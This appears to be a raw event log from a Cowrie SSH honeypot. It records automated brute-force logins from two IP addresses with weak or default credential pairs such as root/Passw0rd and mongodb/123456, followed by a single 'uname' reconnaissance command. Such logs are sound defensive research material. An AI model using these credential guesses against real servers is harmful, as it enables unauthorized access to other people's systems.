{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:18.734608Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47484,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f9e139cf7d","protocol":"ssh","message":"New connection: 212.227.235.229:47484 (1.2.3.4:22) [session: 91f9e139cf7d]","sensor":"my-vps","timestamp":"2025-08-31T01:03:18.958496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:03:18.966755Z","src_ip":"212.227.235.229","session":"91f9e139cf7d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:03:19.199767Z","src_ip":"212.227.235.229","session":"91f9e139cf7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48010,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2c66cf3e0ca","protocol":"ssh","message":"New connection: 212.227.125.160:48010 (1.2.3.4:22) [session: d2c66cf3e0ca]","sensor":"my-vps","timestamp":"2025-08-31T01:03:19.906593Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:03:20.131853Z","src_ip":"212.227.235.229","session":"91f9e139cf7d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:03:20.513952Z","src_ip":"212.227.125.160","session":"d2c66cf3e0ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:03:20.514719Z","src_ip":"212.227.125.160","session":"d2c66cf3e0ca"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:21.370324Z","src_ip":"212.227.235.229","session":"91f9e139cf7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48834,"dst_ip":"1.2.3.4","dst_port":22,"session":"381708228447","protocol":"ssh","message":"New connection: 212.227.235.229:48834 (1.2.3.4:22) [session: 381708228447]","sensor":"my-vps","timestamp":"2025-08-31T01:03:21.612141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:03:21.619605Z","src_ip":"212.227.235.229","session":"381708228447"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:03:21.856156Z","src_ip":"212.227.235.229","session":"381708228447"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:03:22.809733Z","src_ip":"212.227.235.229","session":"381708228447"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:23.048583Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:23.049798Z","src_ip":"212.227.235.229","session":"381708228447"}
{"eventid":"cowrie.login.failed","username":"debian","password":"admin123","message":"login attempt [debian/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:03:23.195430Z","src_ip":"212.227.125.160","session":"d2c66cf3e0ca"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:24.684604Z","src_ip":"212.227.125.160","session":"d2c66cf3e0ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54616,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdacc41048da","protocol":"ssh","message":"New connection: 212.227.125.160:54616 (1.2.3.4:22) [session: fdacc41048da]","sensor":"my-vps","timestamp":"2025-08-31T01:03:26.926205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:03:26.928108Z","src_ip":"212.227.125.160","session":"fdacc41048da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:03:27.001230Z","src_ip":"212.227.125.160","session":"fdacc41048da"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:03:27.222087Z","src_ip":"212.227.125.160","session":"fdacc41048da"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:03:27.557056Z","src_ip":"212.227.125.160","session":"fdacc41048da"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:03:27.557839Z","src_ip":"212.227.125.160","session":"fdacc41048da"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:27.633064Z","src_ip":"212.227.125.160","session":"fdacc41048da"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:27.634193Z","src_ip":"212.227.125.160","session":"fdacc41048da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34260,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e312db78fdf","protocol":"ssh","message":"New connection: 212.227.125.160:34260 (1.2.3.4:22) [session: 0e312db78fdf]","sensor":"my-vps","timestamp":"2025-08-31T01:03:37.242795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:03:37.243810Z","src_ip":"212.227.125.160","session":"0e312db78fdf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:03:37.317178Z","src_ip":"212.227.125.160","session":"0e312db78fdf"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:03:37.538641Z","src_ip":"212.227.125.160","session":"0e312db78fdf"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:38.687204Z","src_ip":"212.227.125.160","session":"0e312db78fdf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49856,"dst_ip":"1.2.3.4","dst_port":22,"session":"aafffbe7705d","protocol":"ssh","message":"New connection: 212.227.125.160:49856 (1.2.3.4:22) [session: aafffbe7705d]","sensor":"my-vps","timestamp":"2025-08-31T01:03:47.686015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:03:47.686933Z","src_ip":"212.227.125.160","session":"aafffbe7705d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:03:47.760719Z","src_ip":"212.227.125.160","session":"aafffbe7705d"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-31T01:03:47.987329Z","src_ip":"212.227.125.160","session":"aafffbe7705d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:49.129952Z","src_ip":"212.227.125.160","session":"aafffbe7705d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33850,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c10e929f5da","protocol":"ssh","message":"New connection: 212.227.125.160:33850 (1.2.3.4:22) [session: 6c10e929f5da]","sensor":"my-vps","timestamp":"2025-08-31T01:03:58.029828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:03:58.031856Z","src_ip":"212.227.125.160","session":"6c10e929f5da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:03:58.105513Z","src_ip":"212.227.125.160","session":"6c10e929f5da"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:03:58.325923Z","src_ip":"212.227.125.160","session":"6c10e929f5da"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:59.409954Z","src_ip":"212.227.125.160","session":"6c10e929f5da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39630,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6729a86691e","protocol":"ssh","message":"New connection: 212.227.235.229:39630 (1.2.3.4:22) [session: b6729a86691e]","sensor":"my-vps","timestamp":"2025-08-31T01:04:00.108226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:04:00.885485Z","src_ip":"212.227.235.229","session":"b6729a86691e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:04:00.886299Z","src_ip":"212.227.235.229","session":"b6729a86691e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62488,"dst_ip":"1.2.3.4","dst_port":22,"session":"52903ae063cc","protocol":"ssh","message":"New connection: 212.227.235.229:62488 (1.2.3.4:22) [session: 52903ae063cc]","sensor":"my-vps","timestamp":"2025-08-31T01:04:02.909502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:04:02.910918Z","src_ip":"212.227.235.229","session":"52903ae063cc"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:04:03.044893Z","src_ip":"212.227.235.229","session":"52903ae063cc"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey","message":"login attempt [macey/macey] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:03.659584Z","src_ip":"212.227.235.229","session":"52903ae063cc"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey1","message":"login attempt [macey/macey1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:04.804486Z","src_ip":"212.227.235.229","session":"52903ae063cc"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey123","message":"login attempt [macey/macey123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:05.939666Z","src_ip":"212.227.235.229","session":"52903ae063cc"}
{"eventid":"cowrie.login.failed","username":"debian","password":"root123","message":"login attempt [debian/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:07.046192Z","src_ip":"212.227.235.229","session":"b6729a86691e"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey1234","message":"login attempt [macey/macey1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:07.075334Z","src_ip":"212.227.235.229","session":"52903ae063cc"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey12345","message":"login attempt [macey/macey12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:08.208977Z","src_ip":"212.227.235.229","session":"52903ae063cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46534,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1ef776dc693","protocol":"ssh","message":"New connection: 212.227.125.160:46534 (1.2.3.4:22) [session: a1ef776dc693]","sensor":"my-vps","timestamp":"2025-08-31T01:04:08.475953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:04:08.476965Z","src_ip":"212.227.125.160","session":"a1ef776dc693"}
